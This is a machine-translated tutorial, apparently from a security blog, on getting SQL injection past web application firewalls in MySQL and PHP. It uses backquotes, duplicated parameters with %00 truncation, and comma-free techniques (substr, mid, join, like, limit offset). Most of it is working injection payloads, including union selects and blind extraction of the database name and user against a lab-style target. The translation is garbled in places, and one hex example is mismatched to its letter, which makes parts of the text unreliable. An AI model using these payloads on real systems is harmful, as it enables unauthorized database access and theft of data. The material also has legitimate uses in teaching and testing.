One 、 Backquote bypass

 stay  mysql  have access to  ` Here are the back quotes `  Bypass some  waf  Intercept . Fields can be backquoted or not , The same meaning .
insert into users(username,password,email)values('test','123456','[email protected]');
insert into users(`username`,`password`,`email`)values('test','123456','[email protected]');

\N'union distinct select 1,(select version() from `users` limit 1)--+&submit=1

Two 、 Scripting language features bypass

1、 Introduce

 stay  php  In language ,id=1&id=2  The following value will automatically overwrite the previous value , Different languages have different characteristics . You can use this to bypass some  waf  Interception of .
id=1%00&id=2 union select 1,2,3
 There are some  waf  Will match the first one  id  Parameters 1%00, %00  Is a truncated character ,waf  Will automatically cut off   So that the following content will not be detected . Into the program ,id  Is equal to  id=2 union select 1,2,3  From bypass injection interception .
 Other language features 

2、 Practice 1

3、 Practice 2

?name=vince%00&name=' union select 1,database()--+&submit=1

3、 ... and 、 Comma around

 At present, some anti injection scripts are intercepted with commas , For example, a comma must be included in a regular injection .
select * from users where id=1 union select 1,2,3,4;
 Generally, commas are filtered to be empty ,select * from users where id=1 union select 1 2 3 4; such SQL  The statement will go wrong . therefore , You can do without commas  SQL  Inject .
 The bypass method is as follows ：

1、 The first way ：substr Intercepting string

 Query the first character of the current library ：
select(substr(database() from 1 for 1)); 
 Inquire about  p  be equal to  select(substr(database() from 1 for 1)), The page returns to normal .
select * from users where id=1 and 'p'=(select(substr(database() from 1 for 1)));
 Can further optimize  m  Switch to  hex 0x6D, This avoids single quotation marks .
select * from users where id=1 and 0x70=(select(substr(database() from 1 for 1)));

?name=vince' and (select(substr(database() from 1 for 1)))='p'--+&submit=1 ?name=vince' and (select(substr(database() from 1 for 1)))='x'--+&submit=1

2、 The second way ：mid Intercepting string

 This  min  Function follows  substr  Same function , If  substr  Functions that are intercepted or filtered can be used instead of .
select (mid(database() from 1 for 1)); 
select * from users where id=1 and 'p'=(select(mid(database() from 1 for 1)));
select * from users where id=1 and 0x70=(select(mid(database() from 1 for 1)));

3、 The third way ： Use join Bypass

 Use  join  Self join two tables ：
union select 1,2 # Equivalent to  union select * from (select 1)a join (select 2)b, among a  and  b  They are the aliases of the table .
select * from users where id=-1 union select 1,2,3,4;
select * from users where id=-1 union select * from (select 1)a join (select 2)b
join(select 3)c join(select 4)d;
select * from users where id=-1 union select * from (select 1)a join (select 2)b
join(select user())c join(select 4)d;
 There is no comma here , To bypass the  waf  Interception of commas .

4、 The fourth way ：like Bypass

 Use  like  Fuzzy query  select user() like '%r%';  The fuzzy query successfully returns  1, Otherwise return to  0
 After finding the first character, continue to the next character matching . To find all the strings , Finally, the content to be queried , such  SQL  There will be no comma in the injection statement . To bypass the  waf  Intercept .

5、 The fifth way ：limit offset Bypass

SQL  When the injection , If you need to qualify entries, you can use  limit 0,1  Limit the number of return entries ,limit 0,1  Return a record . If you intercept commas , have access to  limit 1  The first data is returned by default . You can also use  limit 1 offset 0  Return the first record from zero , This bypasses  waf  Intercept .